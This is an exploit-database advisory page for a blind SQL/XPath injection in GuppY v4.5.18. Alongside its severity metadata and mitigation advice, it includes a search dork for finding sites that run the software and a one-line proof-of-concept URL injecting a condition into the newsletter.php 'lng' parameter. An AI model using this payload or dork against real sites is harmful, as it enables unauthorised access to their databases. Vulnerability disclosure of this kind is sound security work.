header-logo
Suggest Exploit
vendor:
GuppY
by:
indoushka
8,8
CVSS
HIGH
Blind SQL/XPath injection
89
CWE
Product Name: GuppY
Affected Version From: GuppY v4.5.18
Affected Version To: GuppY v4.5.18
Patch Exists: YES
Related CWE: N/A
CPE: a:guppy:guppy:4.5.18
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

GuppY v4.5.18 Blind SQL/XPath injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious SQL/XPath injection payloads to the vulnerable GuppY v4.5.18 application. This can allow the attacker to gain access to sensitive information stored in the back-end database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL/XPath queries.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : GuppY v4.5.18 Blind SQL/XPath injection Vulnerability   
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com
| # Dork     : Site créé avec GuppY v4.5.18 ©
| # Tested on: windows SP2 Français V.(Pnx2 2.0)        
| # Bug      : SQL    
| # Download : http://www.toocharger.com/telecharger/scripts/guppy/3717.htm
======================      Exploit By indoushka       =================================
# Exploit  :  

1 - http://127.0.0.1/guppy/newsletter.php?lng=fr+and+2137718188-60=0+--+

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : Exploit-db Team
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.sa-hacker.com *  www.alkrsan.net * www.mormoroth.net * MR.SoOoFe * ThE g0bL!N
-----------------------------------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR